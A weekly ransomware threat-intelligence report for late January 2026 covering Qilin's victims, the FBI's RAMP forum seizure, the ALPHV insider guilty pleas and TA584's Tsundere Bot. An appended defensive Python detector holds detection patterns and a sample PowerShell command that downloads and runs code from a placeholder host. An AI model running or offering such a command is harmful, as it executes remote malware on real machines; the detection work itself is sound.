Executive Summary
Week 5 of 2026 (January 23–30) was dominated by two major law enforcement developments and continued aggressive activity from Qilin ransomware. The FBI seized the RAMP (Russian Anonymous Marketplace) dark web forum on January 28 — the only known forum explicitly allowing ransomware-as-a-service promotion — disrupting a $20 million cybercrime marketplace used by groups including Qilin, LockBit, DragonForce, and RansomHub. Separately, two US cybersecurity professionals — Ryan Goldberg (Sygnia) and Kevin Martin (DigitalMint) — pleaded guilty to conducting ALPHV/BlackCat ransomware attacks while employed as incident responders. Qilin continued its record-breaking surge with 55+ victims already claimed in January 2026, including Tulsa International Airport (US), Philippine Savings Bank (Philippines), Keil Erdbau (Germany), and Moontown (UK). Dark Web Informer tracked 34 ransomware claims from 9 groups on January 28 alone. Initial access broker TA584 expanded operations with the new Tsundere Bot malware alongside XWorm, using blockchain-based C2 infrastructure and targeting organizations across North America, Europe, and Australia.
Key Statistics:
- Global: 34 ransomware claims on Jan 28 from 9 groups; 23 claims on Jan 26 from 10 groups; Qilin alone has 55+ victims in January 2026
- Europe: Keil Erdbau (Germany), Moontown (UK), Shaw Hill Primary School (UK), FIAMPACK targeted; UK schools remain frequent victims
- Asia: Philippine Savings Bank (Metrobank Group), KSP TLM Indonesia claimed by ransomware groups; Qilin active across APAC
- US: Tulsa International Airport (Qilin), Affordable Housing Management (Shinobi), multiple SMBs; ALPHV guilty pleas highlight insider threats; FBI RAMP seizure
- Other: CIDEF Argentina (Qilin), FRUIT-BONTÉ Agroalimentaire (Tunisia)
1. EUROPE
1.1 Government
No new European government ransomware incidents reported this week. The Inverclyde Council (Scotland) incident from January 19 was confirmed as a phishing/account compromise rather than ransomware.
1.2 Health, Municipalities & Non-commercial
Shaw Hill Primary School (UK) — Listed among ransomware victims tracked on January 28, 2026. Shaw Hill Primary School in Birmingham was claimed by a ransomware group. Limited details available on the scope of the attack or data compromised. (Dark Web Informer)
Moontown (UK) — Claimed by Qilin ransomware on January 29, 2026. The UK-based organization uses Microsoft 365 infrastructure. No public statement from the victim at time of writing. (Ransomware.live)
1.3 Business
Keil Erdbau (Germany) — German construction/earthworks firm claimed by Qilin ransomware on January 29, 2026. HudsonRock detected infostealer activity with 5 compromised users. Germany remains among Qilin’s top-targeted countries. (Ransomware.live, Red Packet Security)
FIAMPACK (Europe) — Contract packaging company listed among January 28 ransomware victims. (Dark Web Informer)
Morison Insurance Brokers (Ontario, Canada) — Listed among victims tracked on January 28. (Dark Web Informer)
2. ASIA
2.1 Government
No new Asian government ransomware incidents reported this week.
2.2 Health, Municipalities & Non-commercial
No incidents reported this week.
2.3 Business
Philippine Savings Bank (Metrobank Group, Philippines) — Claimed by Qilin ransomware group on January 28, 2026. Philippine Savings Bank is a subsidiary of the Metrobank Group, one of the Philippines’ largest financial conglomerates. No public confirmation or details of data exfiltration from the bank at time of writing. (Ransomware.live, HookPhish)
KSP TLM Indonesia — Listed among ransomware victims tracked around January 28, 2026. Limited details available. (Dark Web Informer)
InfoCom (Qilin) — Claimed by Qilin ransomware on January 28, 2026. (Ransomware.live)
3. UNITED STATES
3.1 Government
Tulsa International Airport (Oklahoma) — Claimed by Qilin ransomware on January 30, 2026. The airport is a major regional hub serving northeastern Oklahoma. The claim was tracked by multiple threat intelligence sources including Ransomware.live and FalconFeeds.io. No public confirmation from airport authorities regarding the scope of the attack or any operational disruption at time of writing. (CyberNews, Ransomware.live)
ALPHV/BlackCat Guilty Pleas — On January 28, two former US cybersecurity professionals pleaded guilty to conspiracy to commit extortion for conducting ALPHV/BlackCat ransomware attacks between April and December 2023. Ryan Goldberg (40, Georgia), an incident response manager at Sygnia, and Kevin Martin (36, Texas), a ransomware negotiator at DigitalMint, abused their positions to extort victims in pharmaceutical, engineering, healthcare, and drone manufacturing sectors. Ransom demands ranged from $300,000 to $10 million, with at least $1.27 million confirmed paid. Sentencing scheduled for March 12, 2026; both face up to 20 years in prison. (SecurityWeek, The Record)
3.2 Health, Municipalities & Non-commercial
Affordable Housing Management, Inc. (AHM) — Nonprofit affordable housing organization established in 1970, claimed by the Shinobi ransomware group on January 27, 2026. AHM develops and manages affordable rental housing. (Ransomware.live, Dark Web Informer)
New Beginnings Church — Listed among January 28 ransomware victims. (Ransomware.live)
JBS Mental Health Authority (Medusa) — Regional US nonprofit providing community mental health services was listed by Medusa ransomware in late December 2025. Medusa claims to have stolen 168.6 GB of data including sensitive client records and internal operational information. Confirmed during this reporting period. (Check Point Research, BreachSense)
3.3 Business
JP Research, Inc. — Listed among January 28 ransomware victims. (Ransomware.live)
Anagnos Door Co. — Listed among January 28 ransomware victims. (Dark Web Informer)
Newkirk Zwagerman, P.L.C. (Iowa) — Employment law firm in Des Moines listed among January 28 ransomware victims. (Dark Web Informer)
David M. Schwarz Architects (Qilin) — Architecture firm claimed by Qilin. Discovery date in the January 23–30 window. (Ransomware.live)
Active Green + Ross (Ontario, Canada) — Tire and auto service chain listed among January 28 ransomware victims. (Ransomware.live)
Gallagher Transport International — Customs broker listed among late January ransomware victims. (Dark Web Informer)
4. REST OF WORLD
4.1 Government
No incidents reported this week.
4.2 Health, Municipalities & Non-commercial
No incidents reported this week.
4.3 Business
FRUIT-BONTÉ Agroalimentaire (Tunisia) — Food industry company listed among ransomware victims tracked around January 28, 2026. (Dark Web Informer)
CIDEF Argentina S.A. (Qilin) — Argentine company claimed by Qilin ransomware. Listed in the January 23–30 window. (Ransomware.live)
5. THREAT ACTOR ACTIVITY
Qilin — Most Active Group
Qilin continued its unprecedented surge, already claiming 55+ victims in January 2026 alone, ahead of its record 2025 pace (1,066 victims, +408% YoY). Notable claims this week include Tulsa International Airport, Philippine Savings Bank, Keil Erdbau, Moontown, InfoCom, and CIDEF Argentina. The group practices double extortion with cross-platform capabilities (Windows, Linux, ESXi) and has absorbed affiliates from collapsed RansomHub and LockBit operations. (Barracuda)
FBI RAMP Forum Seizure
On January 28, the FBI seized the RAMP (Russian Anonymous Marketplace) dark web forum and its clearnet domain ramp4u.io — the only known forum explicitly allowing ransomware-as-a-service promotion. RAMP facilitated an estimated $20 million in cybercrime since its July 2021 launch. Groups including Qilin, LockBit, DragonForce, RansomHub, and ALPHV/BlackCat promoted their operations there. Forum operator “Stallman” confirmed on XSS forum that the takedown “destroyed years of my work” with no plans to rebuild. Leaked database screenshots appeared on Telegram, including alleged LockBit registration details. Arrests are expected within six months. (Bleeping Computer, The Register)
TA584 / Storm-0900 — Initial Access Broker Expansion
Proofpoint published research on January 28 detailing TA584’s expanded operations using Tsundere Bot alongside XWorm RAT. Key developments:
- TA584 activity tripled in late 2025 vs. Q1
- Targeting expanded from North America and UK/Ireland to include Germany, other European countries, and Australia
- Tsundere Bot uses blockchain-based C2 discovery via the Ethereum network
- Attack chains use ClickFix-style social engineering with PowerShell execution
(Proofpoint, Bleeping Computer)
Shinobi
Claimed Affordable Housing Management (US nonprofit) on January 27. The group continues targeting US organizations across healthcare, housing, and auto sectors.
Medusa
JBS Mental Health Authority listing confirmed, with 168.6 GB data theft claimed. Medusa continues filling the vacuum left by LockBit and BlackCat takedowns.
Amnesia RAT + Ransomware Campaign
A new multi-stage phishing campaign targeting Russian users was observed on January 24, deploying Amnesia RAT and ransomware through business-themed document lures. Reported by Fortinet FortiGuard Labs.
6. KEY TAKEAWAYS
Law enforcement momentum continues. The RAMP forum seizure represents a meaningful disruption to ransomware infrastructure, eliminating the only known dark web forum explicitly hosting RaaS operations. Combined with the ALPHV/BlackCat guilty pleas, this week demonstrated that law enforcement is increasingly targeting both infrastructure and individual operators — including those working within the cybersecurity industry itself.
Qilin’s dominance is accelerating. With 55+ victims in January alone, Qilin is on pace to far exceed its 2025 record of 1,066 victims. The group’s willingness to target critical infrastructure (airports, banks, healthcare) and its absorption of displaced affiliates from dismantled groups make it the most significant ransomware threat entering 2026.
Insider threats are real. The Goldberg/Martin guilty pleas highlight a concerning trend: cybersecurity professionals using their access and knowledge for criminal purposes. Organizations should implement robust access controls and monitoring even for trusted security staff.
Initial access brokers are innovating. TA584’s adoption of blockchain-based C2 (Tsundere Bot) represents an evolution in evasion techniques. The tripling of their activity volume and geographic expansion signals increased supply of compromised network access for ransomware operators.
Small organizations remain vulnerable. This week’s victims include a primary school, a church, a nonprofit housing provider, a small law firm, and various SMBs — confirming that ransomware groups increasingly target organizations with limited security resources.
Defensive Recommendations
- Monitor for indicators associated with Qilin, particularly in manufacturing, financial services, and infrastructure sectors
- Restrict PowerShell execution to reduce TA584/XWorm/Tsundere Bot infection risk
- Review vendor and third-party access controls in light of insider threat cases
- Ensure offline backup procedures are current, particularly for organizations in healthcare and education
- Monitor for RAMP forum fallout — displaced threat actors may migrate to alternative platforms
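As an added example (not part of this report, and not Proofpoint's or any vendor's code), the following Python triage check flags ClickFix-style PowerShell launches in process-creation telemetry, the pattern the TA584 section and the PowerShell recommendation above refer to. The record field names (Image, ParentImage, CommandLine, in Sysmon style) and the three sample records are constructed assumptions.

```python
import re

# Parent processes from which a user-pasted "fix" typically spawns PowerShell
SUSPICIOUS_PARENTS = {"explorer.exe", "mshta.exe", "cmd.exe"}

# Command-line traits that rarely co-occur in legitimate admin scripting
FLAG_PATTERNS = [
    (r"-(?:w|win|windowstyle)\s+hidden", "hidden window"),
    (r"-(?:e|ec|enc|encodedcommand)\s+[a-z0-9+/=]{20,}", "encoded command"),
    (r"\b(?:iex|invoke-expression)\b", "in-memory execution"),
    (r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b",
     "remote download"),
    (r"-(?:nop|noprofile)\b", "profile bypass"),
]

def score_event(event):
    """Return the list of indicators matched by one process-creation record."""
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    cmd = event.get("CommandLine", "").lower()
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    hits = [label for pat, label in FLAG_PATTERNS if re.search(pat, cmd)]
    if parent in SUSPICIOUS_PARENTS:
        hits.append(f"launched from {parent}")
    return hits

def is_clickfix_like(event, min_hits=2):
    """Alert only when several indicators co-occur; a single flag such as
    -NoProfile is common in benign scheduled scripts."""
    return len(score_event(event)) >= min_hits

# Constructed sample records (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (irm https://placeholder.invalid/x)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Backup\agent.exe",
     "CommandLine": r"powershell -NoProfile -File C:\scripts\rotate-logs.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
]

def triage(events):
    """Return (index, indicators) for every record that crosses the threshold."""
    return [(i, score_event(e)) for i, e in enumerate(events) if is_clickfix_like(e)]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Only the first sample record is flagged; the backup agent's -NoProfile script scores a single indicator and stays below the threshold.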